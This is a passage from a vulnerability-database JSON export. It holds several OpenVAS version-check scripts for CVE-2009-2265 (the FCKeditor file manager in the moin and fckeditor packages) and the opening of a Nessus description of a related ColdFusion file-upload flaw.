"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "The remote host is missing an update to moin\nannounced via advisory FEDORA-2009-7794.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064414", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064414", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7794 (moin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7794.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7794 (moin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update removes the filemanager directory from the embedded FCKeditor, it\ncontains code with know security vulnerabilities, even though that code couldn't\nbe invoked when Moin was used with the default settings. Moin was probably not\naffected, but installing this update is still recommended as a security measure.\nCVE-2009-2265 is the related CVE identifier.\n\nChangeLog:\n\n* Sun Jul 12 2009 Ville-Pekka Vainio 1.8.4-2\n- Remove the filemanager directory from the embedded FCKeditor, it contains\ncode with know security vulnerabilities, even though that code couldn't\nbe invoked when moin was used with the default settings.\n- Fixes rhbz #509924, related to CVE-2009-2265\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update moin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7794\";\ntag_summary = \"The remote host is missing an update to moin\nannounced via advisory FEDORA-2009-7794.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64414\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-7794 (moin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=509924\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.4~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 1836-1.", "modified": "2017-07-07T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64424", "href": "http://plugins.openvas.org/nasl.php?oid=64424", "type": "openvas", "title": "Debian Security Advisory DSA 1836-1 (fckeditor)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1836_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1836-1 (fckeditor)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Vinny Guido discovered that multiple input sanitising vulnerabilities\nin Fckeditor, a rich text web editor component, may lead to the\nexecution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain fckeditor.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:2.6.2-1lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.4.1-1.\n\nWe recommend that you upgrade your fckeditor package.\";\ntag_summary = \"The remote host is missing an update to fckeditor\nannounced via advisory DSA 1836-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201836-1\";\n\n\nif(description)\n{\n script_id(64424);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1836-1 (fckeditor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"2.6.2-1lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:05:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "Check for the Version of moin", "modified": "2018-01-23T00:00:00", "published": "2010-03-02T00:00:00", "id": "OPENVAS:1361412562310861696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861696", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-1743", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-1743\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035374.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861696\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1743\");\n script_cve_id(\"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-1743\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.7~1.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "description": "The remote host is missing an update to moin\nannounced via advisory FEDORA-2009-7794.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64414", "href": "http://plugins.openvas.org/nasl.php?oid=64414", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7794 (moin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7794.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7794 (moin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update removes the filemanager directory from the embedded FCKeditor, it\ncontains code with know security vulnerabilities, even though that code couldn't\nbe invoked when Moin was used with the default settings. Moin was probably not\naffected, but installing this update is still recommended as a security measure.\nCVE-2009-2265 is the related CVE identifier.\n\nChangeLog:\n\n* Sun Jul 12 2009 Ville-Pekka Vainio 1.8.4-2\n- Remove the filemanager directory from the embedded FCKeditor, it contains\ncode with know security vulnerabilities, even though that code couldn't\nbe invoked when moin was used with the default settings.\n- Fixes rhbz #509924, related to CVE-2009-2265\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update moin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7794\";\ntag_summary = \"The remote host is missing an update to moin\nannounced via advisory FEDORA-2009-7794.\";\n\n\n\nif(description)\n{\n script_id(64414);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-7794 (moin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=509924\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.4~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-22T13:05:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "Check for the Version of moin", "modified": "2018-01-22T00:00:00", "published": "2010-04-09T00:00:00", "id": "OPENVAS:1361412562310861868", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861868", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-6012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-6012\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-April/038490.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861868\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-6012\");\n script_cve_id(\"CVE-2010-0828\", \"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-6012\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.7~2.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-15T11:57:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "Check for the Version of moin", "modified": "2017-12-15T00:00:00", "published": "2010-06-18T00:00:00", "id": "OPENVAS:862153", "href": "http://plugins.openvas.org/nasl.php?oid=862153", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-9876", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-9876\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042795.html\");\n script_id(862153);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-18 17:26:33 +0200 (Fri, 18 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-9876\");\n script_cve_id(\"CVE-2010-0828\", \"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-9876\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.8~1.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:54:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "Check for the Version of moin", "modified": "2018-01-02T00:00:00", "published": "2010-06-18T00:00:00", "id": "OPENVAS:1361412562310862153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862153", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-9876", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-9876\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/042795.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862153\");\n script_version(\"$Revision: 8269 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 08:28:22 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-18 17:26:33 +0200 (Fri, 18 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-9876\");\n script_cve_id(\"CVE-2010-0828\", \"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-9876\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.8~1.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265", "CVE-2010-0828"], "description": "Check for the Version of moin", "modified": "2017-12-22T00:00:00", "published": "2010-04-09T00:00:00", "id": "OPENVAS:861868", "href": "http://plugins.openvas.org/nasl.php?oid=861868", "type": "openvas", "title": "Fedora Update for moin FEDORA-2010-6012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2010-6012\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"moin on Fedora 11\";\ntag_insight = \"MoinMoin is an advanced, easy to use and extensible WikiEngine with a large\n community of users. Said in a few words, it is about collaboration on easily\n editable web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-April/038490.html\");\n script_id(861868);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-6012\");\n script_cve_id(\"CVE-2010-0828\", \"CVE-2009-2265\");\n script_name(\"Fedora Update for moin FEDORA-2010-6012\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.8.7~2.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-02-26T09:44:38", "description": "The version of Adobe ColdFusion running on the remote host is\naffected by an arbitrary file upload vulnerability. The installed\nversion ships with a vulnerable version of an open source HTML text\neditor, FCKeditor, that fails to properly sanitize input passed to\nthe 'CurrentFolder' parameter of the 'upload.cfm' script located under\n'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.\n\nAn attacker can leverage this issue to upload arbitrary files and\nexecute commands on the remote system subject to the privileges of the\nweb server user id.", "edition": 29, 